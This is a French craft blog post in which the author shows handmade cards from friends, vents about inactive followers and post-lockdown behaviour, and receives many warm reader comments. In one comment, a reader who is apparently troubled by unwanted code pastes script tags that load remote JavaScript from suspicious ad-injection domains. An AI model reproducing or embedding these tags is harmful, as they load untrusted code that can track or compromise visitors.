• Dans ma Bal ♥♥♥

     

     

    Dans ma Bal ♥♥♥

     

     

    Bonjour tout le monde..... J'espère que vous allez bien, moi ça va tout doucement, des comportements de certaines personnes qui me contrarient.... Mais je crée beaucoup en ce moment, donc j'aurais des choses à vous montrer prochainement....

    Après avoir supprimer les silencieuses depuis plusieurs mois (hormis celles qui ont des soucis...), je ne visite que celles qui me visitent.... Je referai le point chaque mois et je supprimerai sans avertir dorénavant.... Marre de celles qui s'inscrivent juste pour avoir une abonnée de plus sur leur blog, qui ne visitent que lorsque elles publient ou à l'approche de leur anniversaire.... Ce sont des comportements que je ne comprends pas....

    Et, au vu des comportements que l'on observe lors du déconfinement..... plus rien ne m'étonne...

    Égoïsme, Intolérance, Irrespect, Indifférence aux autres....

    Je ne mange pas de ce pain là !

    Voilà besoin d'un coup de gueule.... Je ne dirai plus rien sur ce sujet.... J'agirai....

    Ici il fait froid mais le soleil est là, je pense reprendre mes promenades quotidiennes.... Histoire de me vider la tête et de découvrir ma campagne environnante que je ne connais pas encore...

     

    Maintenant place aux Merveilles que j'ai trouvées dans ma Bal cette semaine...

     

     

    Dans ma Bal ♥♥♥

     

     

    De Mamiga...

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

    Pour visiter son blog

     

    Dans ma Bal ♥♥♥

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

     

     

    D’Élisabeth Marteen...

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

    Dans ma Bal ♥♥♥

     

     

    Pour visiter son blog...

     

     

    Dans ma Bal ♥♥♥

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

     

     

    De Marianne...

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

    Dans ma Bal ♥♥♥

     

     

    Pour visiter son blog...

     

     

    Dans ma Bal ♥♥♥

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

    Vous savez combien vous m'avez comblée les filles, je vous l'ai dit via mail ♥♥♥

    Encore une fois je vous le redis...

     

     

    Dans ma Bal ♥♥♥

     

     

     

     

    Dans ma Bal ♥♥♥

     

     

     

     

    Dans ma Bal ♥♥♥

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    37
    Lundi 18 Mai 2020 à 20:31

    Que du bonheur dans ta bal......bravo aux amies qui t'ont bien gâtée je suis heureuse pour toi

    Gros bisous Pierrette67

    36
    Dimanche 17 Mai 2020 à 21:01
    bibikafeine

    superbe BAL !

    bises

    35
    Dimanche 17 Mai 2020 à 10:00

    ta bal est magique elle contient du bonheur

    bisous

    34
    Samedi 16 Mai 2020 à 14:06

    Bonjour ma chère Valie

    Un petit coucou pour te souhaiter un bon week-end

    je suis en retard dans mes commentaires car hier j'étais peu bien !

    Je t'envoie avec toute mon amitié de gros bisous

    Janine

    33
    Samedi 16 Mai 2020 à 07:20

    Que de belles réas ! Bravo les copines !

    Bisous bisous !

    32
    qinoa
    Vendredi 15 Mai 2020 à 17:28

    de très très belles choses, bravo aux copinettes qui ont bien travaillé.

    Et bien en ce qui concerne mon envoi....je l'ai retrouvé hier dans ma bal, en retour...peut-être une fausse adresse ? Rien n'est mentionnée.

    Je te contacte sur ton mail pour savoir si j'ai fait une erreur d'adresse

    bzz

    31
    Jacline-H-49
    Vendredi 15 Mai 2020 à 16:49

    Bon après midi chère Valie,

    Après ton coup de gueule, nécessaire, j'espère que tu t'es levée du pied droit ce matin. D'autant plus que le soleil est là et pour plusieurs jours. 

    Depuis le temps que tes amies copinautes t'envoient des merveilles dans ta BAL, je n'en ai jamais vues deux semblables, comme quoi l'imagination n'appartient qu'à une seule personne et dénote son personnage.

    Je suis heureuse pour toi mon amie, et que tout continue de la sorte.

    Bonne fin de journée avec mes 

    GROS BISOUS TENDRESSE, pour te tenir compagnie.

    *Jacline*

      

    30
    Vendredi 15 Mai 2020 à 11:03

    tout cela est ravissant, une sacrée somme de travail créatif et je t'en félicite. Bonne continuation, à ta disposition pour mon prochain design. Gros bisous d'amitié

    29
    winie166
    Vendredi 15 Mai 2020 à 10:49

    coucou, tu as et très gâtée t c est mérité ! de magnifiques créations ! mi j attends que mondial relay pour envoyé a une amie en France ui me poste mes envoies

    bisous

    28
    Vendredi 15 Mai 2020 à 08:13

    Tu as été bien joliment gâtée. Bon weekend. Bisous

    27
    Jeudi 14 Mai 2020 à 21:34
    Tu as reçu de bien belles créations. C'est vrai que les promenades nous font vraiment du bien. Ça nous aére l'esprit. Bonne soirée ma belle, bisous xoxo
    26
    Jeudi 14 Mai 2020 à 19:50

    Bonsoir ma chère Valie

    C'est la même chose sur tous les blogs ! et tu as raison

    Par contre pour les gens dans la rue

    ils ne s'inquiètent pas du tout que leurs comportements vis à vis des autres personnes , pas de masques et souvent à plusieurs ils nous bousculent dans la rue et les commerces  et il ne faut surtout ne rien dire sinon on se fait encore insulter , c'est déplorable 

    Tu as reçu de beaux cadeaux de tes amies je suis contente pour toi car tu le mérites amplement 

    Bonne et douce soirée et gros bisous

    Janine

    25
    Jeudi 14 Mai 2020 à 18:06

    Une jolie BAL à bonheur!! Bravo aux copinettes.....

    Moi aussi comme toi je supprime et garde mes fidèles amies

    Bisous et douce soirée

    24
    luce
    Jeudi 14 Mai 2020 à 17:49

    Je comprends ce coup de gueule, quant à moi j'ai découvert par hasard ton blog il me met du beaume au coeur, car je ne sais pas faire de si jolie chose. j'aimerais me lancer, mais pour l'instant dentelle aux fuseaux , broderie, généalogie m'occupe beaucoup. Je fais partie d'un groupe de chant de marin aussi en sommeil pour l(instant. Amicalement

    23
    Jeudi 14 Mai 2020 à 17:26
    C'est la vie...il y a des gens bien et d'autres moins bien.
    Tu as reçu de jolies choses, tu as du être heureuse. Je suis contente pour toi.
    Gros bisous Béa
    22
    Jeudi 14 Mai 2020 à 17:24

    Coucou ma Valie, tu as reçu de magnifiques cartes d'anniversaire, bravo à elles. Passe une belle fin de journée, bisou rose tendresse !

    21
    Jeudi 14 Mai 2020 à 16:54

    de magnifiques présents dans ta BAL 

    c'est génial

    bisous

    20
    Jeudi 14 Mai 2020 à 16:44

    Le monde est ainsi fait, des gens biens et des baufs !

    Il faut rester centrer sur les belles choses et se protéger des autres.

    Je suis contente d'avoir participé à cette jolie bal, les copinettes t'ont créent de bien jolies choses,, bravo à toutes.

    Gros bisous, passe une belle fin de journée.

    19
    gaelle
    Jeudi 14 Mai 2020 à 16:36

    coucou valie, une superbe bal a laquelle j'ai modestement contribué.

    bravo aux creatrices pour leur imagination!!!

    biz

    gaelle

    18
    Jour de Mai
    Jeudi 14 Mai 2020 à 16:15

    Coucou Valie, 

    Pas très en avance mais ce matin, j'ai bien "carburée", nettoyé, astiqué, casa toujours pimpante et il est vrai que c'est bien agréable et après le déjeuner, une belle balade comme avant mais avec un masque et vrai, il y avait plus de monde dehors et pourtant il était 13h30 !

    En rentant, je me suis assoupie et mon Gentleman qui vient de se lever après une sieste m'a dit, j'ai mal aux mollets et aux genoux ........ hihihi, cela faisait longtemps.

    Je comprends pourquoi tu t'étais levée du pied gauche........ parfois il faut pousser son coup de "gueule" mais au travers de ton post, que de magnifiques choses.Ta patience a été récompensée. 

    Bravo aux créatrices. 

    Belle fin d'après-midi et de très gros bisous ♥♥♥

    LN 

    17
    Jeudi 14 Mai 2020 à 14:58

    De très très belles attentions ;

    bisous / Nicole.

     
     
    16
    Jeudi 14 Mai 2020 à 13:56

    Te voilà comblée pour apaiser ce coup de gueule partagé et compréhensif !! Je suis exaspérée des comportements irrespectueux, et incorrects !!
    Allez, haut les coeurs comme dirait Maman !!
    Gros Bisous

    15
    Jeudi 14 Mai 2020 à 13:49

    Bravo pour ton coup de gueule que j'apprécie à 100%

    Tu as été bien gâtée et tu le mérites.

    Ici il fait un peu frisquet 17° seulement et un soleil timide.

    Bonne fin de journée.
    Gros bisous.

    14
    marianne pirotte
    Jeudi 14 Mai 2020 à 13:34

    Je suis d'accord avec toi !!!

    De superbes créations dans ta bal, tu as été joliment gâtée, je suis très heureuse de t'avoir fait plaisir, que du bonheur

    Gros bisous bien froid

    Marianne

    13
    Jeudi 14 Mai 2020 à 13:33
    Je suis d'accord avec toi ! Certaines viennent uniquement pour avoir un tuto gratuit et après aucune nouvelle ! Tu as été bien gâtée ! Bonne journée. Bisous
    12
    Jeudi 14 Mai 2020 à 13:28

    Que de magnifiques cartes !!  Bravo à toutes ces créatrices...

    Toute nouvelle ici, c'est donc avec un peu de retard que je te souhaite un très bon anniversaire !!

    Et tout à fait d'accord avec ton coup de gueule, les gens sont égoïstes et ne pensent qu'à leur petite personne

    Merci encore pour toutes tes belles créations et à bientôt

    Bizzz amicales...

    11
    mamijojo77100
    Jeudi 14 Mai 2020 à 13:00

    que dire de plus je suis d accord sur ce point. on se donne du mal pour etre agreable aux copines, de faire passer un agreable moment, je tiens compte aussi de celles qui ont des soucis et autres..Mais j en ai bien une bonne dizaine qui sont silencieuses!!!! qqx fois CB EST RESPONSABLE...  mais pas toujours..!!!!!..ici frisquet, enfin deux masques dans ma bal ce matin par la mairie, heureusement  que je n attendais pas apres eux..pour prendre mes precautions bises et bon apm joelle

    j ai tjs pas resolu le probleme ci dessous ...!!!!!!!!

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1589453605850" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    10
    Jeudi 14 Mai 2020 à 11:44
    Tas bien raison comme ca c est dit tout a fait daccord
    Quelle jolie bal bravo les copines

    Bisous belle journée valie nous aussi soleil mais trop de vent ca caille pour rester dehors dommage
    9
    Jeudi 14 Mai 2020 à 11:32

    Moi j'Adooore ton coup de gueule ma Valie, je pense entièrement comme toi !!!!

    Quelle belle BAL, Bravo aux talentueuses créatrices, heureuse pour toi ma Doucette.

    Vu le temps frisquet que nous avons et bien scrappons, scrappons, Lol !!

    Bisous tout doux.

    8
    Jeudi 14 Mai 2020 à 11:31

    coucou valie. tu as reçus une jolie bal un grand bravo aux créatrices. je te souhaite une excellente journée bisous liliane

    7
    Jeudi 14 Mai 2020 à 11:27

    Bonjour ma Valie....Une bien belle BAL de tes copines.. Bravo à elle ....

    Je suis d'accord avec tes propos...

    Passe une belle journée ensoleillée

    Bisous de Pat

    6
    Jeudi 14 Mai 2020 à 11:23

    De bien jolies choses dans ta bal l'escargot est magnifique .Ta carte sent bon le printemps .Bisous

     

    5
    Jeudi 14 Mai 2020 à 11:22

    Le facteur te dépose des petits trésors en retard, mais ça valait la peine d'attendre car c'est superbe, les copinautes ont toujours beaucoup d'imagination en réserve

    Bon jeudi, nous fraîcheur mais soleil

    Gros bisous

    4
    Jeudi 14 Mai 2020 à 11:18

    Il y a longtemps ma Valie que je me suis aperçue que les gens sont egoistes et que ce que nous venons de vivre ne changera en rien les comportements, je suis seule , isolée et ne reçoit aucune nouvelle de personne, je n avais plus rien dans mon frigo ne pouvant et n ayant aucunement le droit de me déplacer aucun voisin n est venu me voir heureusement j ai eu un appel de la mairie, quant aux blogs je ne viens plus que très peu ayant été fort déçues par le comportement de certaines alors mes priorités vont à ma santé et à mes fideles amies comme Ambrounette, toi et quelques autres fideles de mon blog bisous et n aie aucun chagrin la vie est ainsi faite et ne changera pas 

    3
    Jeudi 14 Mai 2020 à 11:12

    le coup de gueule est justifié, je supprime aussi et ne garde que les fidèles!! Cela fait du bien parfois! En tout cas une jolie bal, bravo aux copines! Je vais pouvoir peut-être reprendre mes envois, mais la poste ne fonctionne pas tous les jours ici alors je me méfie!! Bisous Nadine

    2
    Jeudi 14 Mai 2020 à 11:08

    Pleins de choses encore une fois dans ta Bal pour ton plus grand plaisir ! Pour ma part je n'ai rien encore envoyé. Avec la réouverture envisagée du collège et tous les dossiers d'inscription pour mes 2 enfants en collège et lycée, j'ai un peu de mal à gérer. Donc je ne t'oublie pas, mais je serai très très en retard... dsl. 

    Je t'embrasse

    Thaly

    1
    Jeannine (cristal24)
    Jeudi 14 Mai 2020 à 11:00

    Coucou Valie,

    Tu as reçu de jolies cartes.

    Et bien sûr, j'ai raté ton anniversaire.

    Il va falloir vite que je me rattrape.....patience, ça va venir .

    Bonne journée; le soleil est là ce matin, alors qu'hier on avait la pluie.

    A très bientôt.  Bises.

    Jeannine

    PS: Je suis tout à fait d'accord avec ce que tu dis au début.

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :